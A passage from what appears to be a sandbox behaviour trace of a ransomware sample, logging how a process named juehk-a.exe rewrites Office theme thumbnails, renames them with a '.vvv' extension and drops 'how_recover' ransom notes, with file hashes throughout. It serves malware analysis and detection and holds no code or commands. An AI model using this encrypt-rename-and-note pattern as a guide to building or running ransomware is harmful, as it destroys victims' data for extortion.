20338.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20339.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20340.          processinfo:
20341.            pid: 1648
20342.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20343.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20344.            ads:
20345.          fid (ads:): 562949953521280
20346.          ntstatus: 0x0
20347.          CreateOptions: 0x0
20348.        file:
20349.          timestamp: 81524
20350.          mode: open
20351.          sequenceNumber: 1436
20352.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
20353.          filesize: 34916
20354.          processinfo:
20355.            pid: 1648
20356.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20357.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20358.            ads:
20359.          fid (ads:): 562949953499610
20360.          ntstatus: 0x0
20361.          CreateOptions: 0x60
20362.        file:
20363.          timestamp: 81758
20364.          mode: close
20365.          sequenceNumber: 1437
20366.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
20367.          filesize: 35342
20368.          md5sum: 0b13c6d8f45da9d4a6e087ad1791c9cb
20369.          sha1sum: f9950a2912b4d5cd99974e33f73db785efc947c7
20370.          processinfo:
20371.            pid: 1648
20372.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20373.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20374.            ads:
20375.          fid (ads:): 562949953499610
20376.          ntstatus: 0x0
20377.          CreateOptions: 0x0
20378.        file:
20379.          timestamp: 81882
20380.          mode: rename
20381.          sequenceNumber: 1438
20382.          filesize: 35342
20383.          md5sum: 0b13c6d8f45da9d4a6e087ad1791c9cb
20384.          sha1sum: f9950a2912b4d5cd99974e33f73db785efc947c7
20385.          processinfo:
20386.            pid: 1648
20387.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20388.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20389.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
20390.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG.vvv
20391.            ads:
20392.          fid (ads:): 562949953499610
20393.          ntstatus: 0x0
20394.          CreateOptions: 0x0
20395.        file:
20396.          timestamp: 81942
20397.          mode: created
20398.          sequenceNumber: 1439
20399.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.txt
20400.          processinfo:
20401.            pid: 1648
20402.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20403.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20404.            ads:
20405.          fid (ads:): 562949953521281
20406.          ntstatus: 0x0
20407.          CreateOptions: 0x60
20408.        file:
20409.          timestamp: 81947
20410.          mode: close
20411.          sequenceNumber: 1440
20412.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.txt
20413.          filesize: 2673
20414.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20415.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20416.          processinfo:
20417.            pid: 1648
20418.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20419.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20420.            ads:
20421.          fid (ads:): 562949953521281
20422.          ntstatus: 0x0
20423.          CreateOptions: 0x0
20424.        file:
20425.          timestamp: 81956
20426.          mode: created
20427.          sequenceNumber: 1441
20428.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.html
20429.          processinfo:
20430.            pid: 1648
20431.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20432.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20433.            ads:
20434.          fid (ads:): 562949953521282
20435.          ntstatus: 0x0
20436.          CreateOptions: 0x60
20437.        file:
20438.          timestamp: 81960
20439.          mode: close
20440.          sequenceNumber: 1442
20441.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.html
20442.          filesize: 9480
20443.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20444.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20445.          processinfo:
20446.            pid: 1648
20447.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20448.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20449.            ads:
20450.          fid (ads:): 562949953521282
20451.          ntstatus: 0x0
20452.          CreateOptions: 0x0
20453.        file:
20454.          timestamp: 81965
20455.          mode: open
20456.          sequenceNumber: 1443
20457.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
20458.          filesize: 20627
20459.          processinfo:
20460.            pid: 1648
20461.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20462.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20463.            ads:
20464.          fid (ads:): 562949953499611
20465.          ntstatus: 0x0
20466.          CreateOptions: 0x60
20467.        file:
20468.          timestamp: 82050
20469.          mode: close
20470.          sequenceNumber: 1444
20471.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
20472.          filesize: 21054
20473.          md5sum: c3ca2a30d8fd45d083088fb487181909
20474.          sha1sum: 6a0ef6ba88f138d9cef0fce8edec4e90e3ea4ce1
20475.          processinfo:
20476.            pid: 1648
20477.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20478.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20479.            ads:
20480.          fid (ads:): 562949953499611
20481.          ntstatus: 0x0
20482.          CreateOptions: 0x0
20483.        file:
20484.          timestamp: 82058
20485.          mode: rename
20486.          sequenceNumber: 1445
20487.          filesize: 21054
20488.          md5sum: c3ca2a30d8fd45d083088fb487181909
20489.          sha1sum: 6a0ef6ba88f138d9cef0fce8edec4e90e3ea4ce1
20490.          processinfo:
20491.            pid: 1648
20492.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20493.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20494.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
20495.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG.vvv
20496.            ads:
20497.          fid (ads:): 562949953499611
20498.          ntstatus: 0x0
20499.          CreateOptions: 0x0
20500.        file:
20501.          timestamp: 82111
20502.          mode: created
20503.          sequenceNumber: 1446
20504.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.txt
20505.          processinfo:
20506.            pid: 1648
20507.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20508.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20509.            ads:
20510.          fid (ads:): 562949953521283
20511.          ntstatus: 0x0
20512.          CreateOptions: 0x60
20513.        file:
20514.          timestamp: 82117
20515.          mode: close
20516.          sequenceNumber: 1447
20517.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.txt
20518.          filesize: 2673
20519.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20520.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20521.          processinfo:
20522.            pid: 1648
20523.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20524.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20525.            ads:
20526.          fid (ads:): 562949953521283
20527.          ntstatus: 0x0
20528.          CreateOptions: 0x0
20529.        file:
20530.          timestamp: 82146
20531.          mode: created
20532.          sequenceNumber: 1448
20533.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.html
20534.          processinfo:
20535.            pid: 1648
20536.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20537.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20538.            ads:
20539.          fid (ads:): 562949953521284
20540.          ntstatus: 0x0
20541.          CreateOptions: 0x60
20542.        file:
20543.          timestamp: 82153
20544.          mode: close
20545.          sequenceNumber: 1449
20546.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.html
20547.          filesize: 9480
20548.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20549.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20550.          processinfo:
20551.            pid: 1648
20552.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20553.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20554.            ads:
20555.          fid (ads:): 562949953521284
20556.          ntstatus: 0x0
20557.          CreateOptions: 0x0
20558.        file:
20559.          timestamp: 82160
20560.          mode: open
20561.          sequenceNumber: 1450
20562.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
20563.          filesize: 33009
20564.          processinfo:
20565.            pid: 1648
20566.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20567.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20568.            ads:
20569.          fid (ads:): 562949953499612
20570.          ntstatus: 0x0
20571.          CreateOptions: 0x60
20572.        file:
20573.          timestamp: 82279
20574.          mode: close
20575.          sequenceNumber: 1451
20576.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
20577.          filesize: 33438
20578.          md5sum: 0beb9adb1c692ba1cae23326decbaa09
20579.          sha1sum: baeaf9cc86b6d91204183abdde3133f6aafa2d1b
20580.          processinfo:
20581.            pid: 1648
20582.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20583.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20584.            ads:
20585.          fid (ads:): 562949953499612
20586.          ntstatus: 0x0
20587.          CreateOptions: 0x0
20588.        file:
20589.          timestamp: 82286
20590.          mode: rename
20591.          sequenceNumber: 1452
20592.          filesize: 33438
20593.          md5sum: 0beb9adb1c692ba1cae23326decbaa09
20594.          sha1sum: baeaf9cc86b6d91204183abdde3133f6aafa2d1b
20595.          processinfo:
20596.            pid: 1648
20597.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20598.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20599.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
20600.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG.vvv
20601.            ads:
20602.          fid (ads:): 562949953499612
20603.          ntstatus: 0x0
20604.          CreateOptions: 0x0
20605.        file:
20606.          timestamp: 82399
20607.          mode: created
20608.          sequenceNumber: 1453
20609.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.txt
20610.          processinfo:
20611.            pid: 1648
20612.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20613.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20614.            ads:
20615.          fid (ads:): 562949953521285
20616.          ntstatus: 0x0
20617.          CreateOptions: 0x60
20618.        file:
20619.          timestamp: 82407
20620.          mode: close
20621.          sequenceNumber: 1454
20622.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.txt
20623.          filesize: 2673
20624.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20625.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20626.          processinfo:
20627.            pid: 1648
20628.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20630.            ads:
20631.          fid (ads:): 562949953521285
20632.          ntstatus: 0x0
20633.          CreateOptions: 0x0
20634.        file:
20635.          timestamp: 82415
20636.          mode: created
20637.          sequenceNumber: 1455
20638.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.html
20639.          processinfo:
20640.            pid: 1648
20641.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20642.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20643.            ads:
20644.          fid (ads:): 562949953521286
20645.          ntstatus: 0x0
20646.          CreateOptions: 0x60
20647.        file:
20648.          timestamp: 82426
20649.          mode: close
20650.          sequenceNumber: 1456
20651.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.html
20652.          filesize: 9480
20653.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20654.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20655.          processinfo:
20656.            pid: 1648
20657.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20658.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20659.            ads:
20660.          fid (ads:): 562949953521286
20661.          ntstatus: 0x0
20662.          CreateOptions: 0x0
20663.        file:
20664.          timestamp: 82432
20665.          mode: open
20666.          sequenceNumber: 1457
20667.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
20668.          filesize: 27407
20669.          processinfo:
20670.            pid: 1648
20671.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20672.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20673.            ads:
20674.          fid (ads:): 562949953499613
20675.          ntstatus: 0x0
20676.          CreateOptions: 0x60
20677.        apicall:
20678.          timestamp: 82451
20679.          repeat: 5000
20680.          sequenceNumber: 1458
20681.          processinfo:
20682.            pid: 1648
20683.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20685.          dllname: kernel32.dll
20686.          apiname: Sleep
20687.          address: 0x0041ed5b
20688.        file:
20689.          timestamp: 82486
20690.          mode: close
20691.          sequenceNumber: 1459
20692.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
20693.          filesize: 27822
20694.          md5sum: 43d41f2f04384561c55a229777457213
20695.          sha1sum: 6fcf8155f98eb23ecdcf96a81b6a87a545744224
20696.          processinfo:
20697.            pid: 1648
20698.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20700.            ads:
20701.          fid (ads:): 562949953499613
20702.          ntstatus: 0x0
20703.          CreateOptions: 0x0
20704.        file:
20705.          timestamp: 82497
20706.          mode: rename
20707.          sequenceNumber: 1460
20708.          filesize: 27822
20709.          md5sum: 43d41f2f04384561c55a229777457213
20710.          sha1sum: 6fcf8155f98eb23ecdcf96a81b6a87a545744224
20711.          processinfo:
20712.            pid: 1648
20713.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20714.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20715.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
20716.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG.vvv
20717.            ads:
20718.          fid (ads:): 562949953499613
20719.          ntstatus: 0x0
20720.          CreateOptions: 0x0
20721.        file:
20722.          timestamp: 82522
20723.          mode: created
20724.          sequenceNumber: 1461
20725.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.txt
20726.          processinfo:
20727.            pid: 1648
20728.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20730.            ads:
20731.          fid (ads:): 562949953521287
20732.          ntstatus: 0x0
20733.          CreateOptions: 0x60
20734.        file:
20735.          timestamp: 82526
20736.          mode: close
20737.          sequenceNumber: 1462
20738.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.txt
20739.          filesize: 2673
20740.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20741.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20742.          processinfo:
20743.            pid: 1648
20744.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20746.            ads:
20747.          fid (ads:): 562949953521287
20748.          ntstatus: 0x0
20749.          CreateOptions: 0x0
20750.        file:
20751.          timestamp: 82531
20752.          mode: created
20753.          sequenceNumber: 1463
20754.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.html
20755.          processinfo:
20756.            pid: 1648
20757.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20758.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20759.            ads:
20760.          fid (ads:): 562949953521288
20761.          ntstatus: 0x0
20762.          CreateOptions: 0x60
20763.        file:
20764.          timestamp: 82535
20765.          mode: close
20766.          sequenceNumber: 1464
20767.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.html
20768.          filesize: 9480
20769.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20770.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20771.          processinfo:
20772.            pid: 1648
20773.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20774.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20775.            ads:
20776.          fid (ads:): 562949953521288
20777.          ntstatus: 0x0
20778.          CreateOptions: 0x0
20779.        file:
20780.          timestamp: 82542
20781.          mode: open
20782.          sequenceNumber: 1465
20783.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
20784.          filesize: 31837
20785.          processinfo:
20786.            pid: 1648
20787.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20788.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20789.            ads:
20790.          fid (ads:): 562949953499614
20791.          ntstatus: 0x0
20792.          CreateOptions: 0x60
20793.        file:
20794.          timestamp: 82692
20795.          mode: close
20796.          sequenceNumber: 1466
20797.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
20798.          filesize: 32254
20799.          md5sum: bf9c7997208d67525d6a95082bf09ba7
20800.          sha1sum: eb39b4696916512554c391f833c339290eb15ad9
20801.          processinfo:
20802.            pid: 1648
20803.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20804.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20805.            ads:
20806.          fid (ads:): 562949953499614
20807.          ntstatus: 0x0
20808.          CreateOptions: 0x0
20809.        file:
20810.          timestamp: 82730
20811.          mode: rename
20812.          sequenceNumber: 1467
20813.          filesize: 32254
20814.          md5sum: bf9c7997208d67525d6a95082bf09ba7
20815.          sha1sum: eb39b4696916512554c391f833c339290eb15ad9
20816.          processinfo:
20817.            pid: 1648
20818.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20820.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
20821.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG.vvv
20822.            ads:
20823.          fid (ads:): 562949953499614
20824.          ntstatus: 0x0
20825.          CreateOptions: 0x0
20826.        file:
20827.          timestamp: 82810
20828.          mode: created
20829.          sequenceNumber: 1468
20830.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.txt
20831.          processinfo:
20832.            pid: 1648
20833.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20834.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20835.            ads:
20836.          fid (ads:): 1970324837066841
20837.          ntstatus: 0x0
20838.          CreateOptions: 0x60
20839.        file:
20840.          timestamp: 82816
20841.          mode: close
20842.          sequenceNumber: 1469
20843.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.txt
20844.          filesize: 2673
20845.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20846.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20847.          processinfo:
20848.            pid: 1648
20849.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20851.            ads:
20852.          fid (ads:): 1970324837066841
20853.          ntstatus: 0x0
20854.          CreateOptions: 0x0
20855.        file:
20856.          timestamp: 82826
20857.          mode: created
20858.          sequenceNumber: 1470
20859.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.html
20860.          processinfo:
20861.            pid: 1648
20862.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20863.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20864.            ads:
20865.          fid (ads:): 562949953521289
20866.          ntstatus: 0x0
20867.          CreateOptions: 0x60
20868.        file:
20869.          timestamp: 82830
20870.          mode: close
20871.          sequenceNumber: 1471
20872.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.html
20873.          filesize: 9480
20874.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20875.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20876.          processinfo:
20877.            pid: 1648
20878.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20880.            ads:
20881.          fid (ads:): 562949953521289
20882.          ntstatus: 0x0
20883.          CreateOptions: 0x0
20884.        file:
20885.          timestamp: 82835
20886.          mode: open
20887.          sequenceNumber: 1472
20888.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
20889.          filesize: 43276
20890.          processinfo:
20891.            pid: 1648
20892.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20893.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20894.            ads:
20895.          fid (ads:): 562949953499615
20896.          ntstatus: 0x0
20897.          CreateOptions: 0x60
20898.        file:
20899.          timestamp: 83104
20900.          mode: close
20901.          sequenceNumber: 1473
20902.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
20903.          filesize: 43694
20904.          md5sum: c27d762afa47af058a8cf53c8d8520d4
20905.          sha1sum: 4609d542d70a822b93728984f2c0d75de611cb79
20906.          processinfo:
20907.            pid: 1648
20908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20910.            ads:
20911.          fid (ads:): 562949953499615
20912.          ntstatus: 0x0
20913.          CreateOptions: 0x0
20914.        file:
20915.          timestamp: 83113
20916.          mode: rename
20917.          sequenceNumber: 1474
20918.          filesize: 43694
20919.          md5sum: c27d762afa47af058a8cf53c8d8520d4
20920.          sha1sum: 4609d542d70a822b93728984f2c0d75de611cb79
20921.          processinfo:
20922.            pid: 1648
20923.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20925.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
20926.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG.vvv
20927.            ads:
20928.          fid (ads:): 562949953499615
20929.          ntstatus: 0x0
20930.          CreateOptions: 0x0
20931.        file:
20932.          timestamp: 83137
20933.          mode: created
20934.          sequenceNumber: 1475
20935.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.txt
20936.          processinfo:
20937.            pid: 1648
20938.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20939.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20940.            ads:
20941.          fid (ads:): 562949953521290
20942.          ntstatus: 0x0
20943.          CreateOptions: 0x60
20944.        file:
20945.          timestamp: 83143
20946.          mode: close
20947.          sequenceNumber: 1476
20948.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.txt
20949.          filesize: 2673
20950.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
20951.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
20952.          processinfo:
20953.            pid: 1648
20954.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20956.            ads:
20957.          fid (ads:): 562949953521290
20958.          ntstatus: 0x0
20959.          CreateOptions: 0x0
20960.        file:
20961.          timestamp: 83149
20962.          mode: created
20963.          sequenceNumber: 1477
20964.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.html
20965.          processinfo:
20966.            pid: 1648
20967.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20968.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20969.            ads:
20970.          fid (ads:): 562949953521291
20971.          ntstatus: 0x0
20972.          CreateOptions: 0x60
20973.        file:
20974.          timestamp: 83155
20975.          mode: close
20976.          sequenceNumber: 1478
20977.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.html
20978.          filesize: 9480
20979.          md5sum: a68c3caf0be8f1a393c697136926cfd4
20980.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
20981.          processinfo:
20982.            pid: 1648
20983.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20984.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20985.            ads:
20986.          fid (ads:): 562949953521291
20987.          ntstatus: 0x0
20988.          CreateOptions: 0x0
20989.        file:
20990.          timestamp: 83195
20991.          mode: open
20992.          sequenceNumber: 1479
20993.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
20994.          filesize: 32607
20995.          processinfo:
20996.            pid: 1648
20997.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
20998.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
20999.            ads:
21000.          fid (ads:): 562949953499616
21001.          ntstatus: 0x0
21002.          CreateOptions: 0x60
21003.        file:
21004.          timestamp: 83232
21005.          mode: close
21006.          sequenceNumber: 1480
21007.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
21008.          filesize: 33022
21009.          md5sum: 526cbcc09a487c9cb467a00844eb2a13
21010.          sha1sum: 3c6564c9963bf08d9316976832181877588a458e
21011.          processinfo:
21012.            pid: 1648
21013.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21014.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21015.            ads:
21016.          fid (ads:): 562949953499616
21017.          ntstatus: 0x0
21018.          CreateOptions: 0x0
21019.        file:
21020.          timestamp: 83304
21021.          mode: rename
21022.          sequenceNumber: 1481
21023.          filesize: 33022
21024.          md5sum: 526cbcc09a487c9cb467a00844eb2a13
21025.          sha1sum: 3c6564c9963bf08d9316976832181877588a458e
21026.          processinfo:
21027.            pid: 1648
21028.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21029.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21030.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
21031.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG.vvv
21032.            ads:
21033.          fid (ads:): 562949953499616
21034.          ntstatus: 0x0
21035.          CreateOptions: 0x0
21036.        file:
21037.          timestamp: 83370
21038.          mode: created
21039.          sequenceNumber: 1482
21040.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.txt
21041.          processinfo:
21042.            pid: 1648
21043.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21044.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21045.            ads:
21046.          fid (ads:): 562949953521292
21047.          ntstatus: 0x0
21048.          CreateOptions: 0x60
21049.        file:
21050.          timestamp: 83376
21051.          mode: close
21052.          sequenceNumber: 1483
21053.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.txt
21054.          filesize: 2673
21055.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21056.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21057.          processinfo:
21058.            pid: 1648
21059.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21061.            ads:
21062.          fid (ads:): 562949953521292
21063.          ntstatus: 0x0
21064.          CreateOptions: 0x0
21065.        file:
21066.          timestamp: 83383
21067.          mode: created
21068.          sequenceNumber: 1484
21069.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.html
21070.          processinfo:
21071.            pid: 1648
21072.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21073.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21074.            ads:
21075.          fid (ads:): 562949953521293
21076.          ntstatus: 0x0
